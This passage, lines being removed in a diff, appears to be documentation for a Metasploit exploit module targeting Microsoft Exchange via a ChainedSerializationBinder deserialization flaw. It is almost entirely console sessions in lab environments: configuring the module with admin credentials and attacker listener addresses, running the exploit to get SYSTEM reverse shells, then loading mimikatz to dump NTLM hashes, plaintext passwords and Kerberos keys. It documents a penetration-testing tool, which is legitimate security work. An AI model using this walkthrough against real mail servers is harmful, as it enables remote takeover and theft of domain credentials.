-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter_reverse_https):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
-                                          ess, none)
-   EXTENSIONS                   no        Comma-separate list of extensions to load
-   EXTINIT                      no        Initialization strings for extensions
-   LHOST       172.24.97.166    yes       The local listener hostname
-   LPORT       4444             yes       The local listener port
-   LURI                         no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Windows Dropper
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.24.97.166:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Using URL: http://0.0.0.0:8080/7nZtWqPZw3Oz
-[*] Local IP: http://172.24.97.166:8080/7nZtWqPZw3Oz
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs72
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Command Stager progress - 100.00% done (151/151 bytes)
-[*] Client 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576) requested /7nZtWqPZw3Oz
-[*] Sending payload to 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576)
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Redirecting stageless connection from /886ARUzXt2EUshWwdqdmVAWJyxlofzHG with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Attaching orphaned/stageless session...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 2 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:34:07 -0600
-[*] Server stopped.
-
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
-Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
-                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
-                                                     55d560
-EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
-                                  51c0ce1b0298d82    914aa472be639b241
-                                                     21e69c
-HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
-0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
-                                                     70c944
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
-ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
-ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz
-
-wdigest credentials
-===================
-
-Username              Domain          Password
--------              ------          --------
-(null)                (null)          (null)
-Administrator         TESTINGDOMAIN2  (null)
-EXCHG-2016$           TESTINGDOMAIN2  (null)
-HealthMailbox2e90d89  TESTINGDOMAIN2  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
-                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
-                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
-                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
-                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
-                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
-                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
-                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
-                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
-                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
-                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
-                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
-                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
-                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
-                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
-                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
-                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
-HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
-exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > 
-```
-
-#### Target 2 - PowerShell Stager
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
-target => 2
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter/reverse_https):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
-                                        s, none)
-   LHOST     172.24.97.166    yes       The local listener hostname
-   LPORT     4444             yes       The local listener port
-   LURI                       no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   2   PowerShell Stager
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.24.97.166:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs76
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Staging x64 payload (201308 bytes) ...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 3 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:37:56 -0600
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
-Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
-                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
-                                                     55d560
-EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
-                                  51c0ce1b0298d82    914aa472be639b241
-                                                     21e69c
-HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
-0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
-                                                     70c944
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
-ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
-ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz
-
-wdigest credentials
-===================
-
-Username              Domain          Password
--------              ------          --------
-(null)                (null)          (null)
-Administrator         TESTINGDOMAIN2  (null)
-EXCHG-2016$           TESTINGDOMAIN2  (null)
-HealthMailbox2e90d89  TESTINGDOMAIN2  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
-                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
-                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
-                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
-                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
-                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
-                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
-                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
-                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
-                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
-                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
-                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
-                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
-                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
-                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
-                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
-                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
-HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
-exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > 
-```
-
-### Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
-
-#### Target 0 - Windows Command
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (cmd/windows/powershell_reverse_tcp):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   LHOST         172.31.171.42    yes       The listen address (an interface may be speci
-                                            fied)
-   LOAD_MODULES                   no        A list of powershell modules separated by a c
-                                            omma to download over the web
-   LPORT         4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows Command
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started reverse TCP handler on 172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7f
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Powershell session session 1 opened (172.31.171.42:4444 -> 172.31.160.218:30212 ) at 2022-02-14 18:01:56 -0600
-
-PS C:\windows\system32\inetsrv> whoami
-nt authority\system
-PS C:\windows\system32\inetsrv> exit
-
-[*] 172.31.160.218 - Powershell session session 1 closed.  Reason: User exit
-```
-
-#### Target 1 - Windows Dropper
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set TARGET 1
-TARGET => 1
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter_reverse_https):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
-                                          ess, none)
-   EXTENSIONS                   no        Comma-separate list of extensions to load
-   EXTINIT                      no        Initialization strings for extensions
-   LHOST       172.31.171.42    yes       The local listener hostname
-   LPORT       4444             yes       The local listener port
-   LURI                         no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Windows Dropper
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Using URL: http://0.0.0.0:8080/QULKk6
-[*] Local IP: http://172.31.171.42:8080/QULKk6
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7o
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Client 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268) requested /QULKk6
-[*] Sending payload to 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268)
-[*] Command Stager progress - 100.00% done (145/145 bytes)
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Redirecting stageless connection from /LLPgD_mj7kz9ZPxmn24Q9Qv80ANZ8PU38jaMQ3JCPiwWGPz3Gm6fNlGNzXZ9e_8y5xxnpC6a-JVHNcPmhyMpFnMCwvLNQeZRvnB9 with UA 'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Attaching orphaned/stageless session...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 2 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:02:25 -0600
-[*] Server stopped.
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
-Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
-                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
-                                                    55d560
-DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
-                                 573cd9b08cb33ed    ebf9d421549375da8
-                                                    9bef2d
-HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
-d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
-                                                    7d509b
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
-eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
-ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42
-
-wdigest credentials
-===================
-
-Username              Domain         Password
--------              ------         --------
-(null)                (null)         (null)
-Administrator         TESTINGDOMAIN  (null)
-DC1$                  TESTINGDOMAIN  (null)
-HealthMailbox25ad078  TESTINGDOMAIN  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
-                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
-                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
-                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
-                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
-                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
-                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
-                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
-                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
-                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
-                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
-                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
-                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
-                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
-                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
-                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
-                                              a 3b f2 df ea c1 f6 77 a6 bb cb
-HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
-dc1$                  TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > exit
-[*] Shutting down Meterpreter...
-
-[*] 172.31.160.218 - Meterpreter session 2 closed.  Reason: User exit
-```
-#### Target 2 - PowerShell Stager
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
-target => 2
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter/reverse_https):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
-                                        s, none)
-   LHOST     172.31.171.42    yes       The local listener hostname
-   LPORT     4444             yes       The local listener port
-   LURI                       no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   2   PowerShell Stager
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
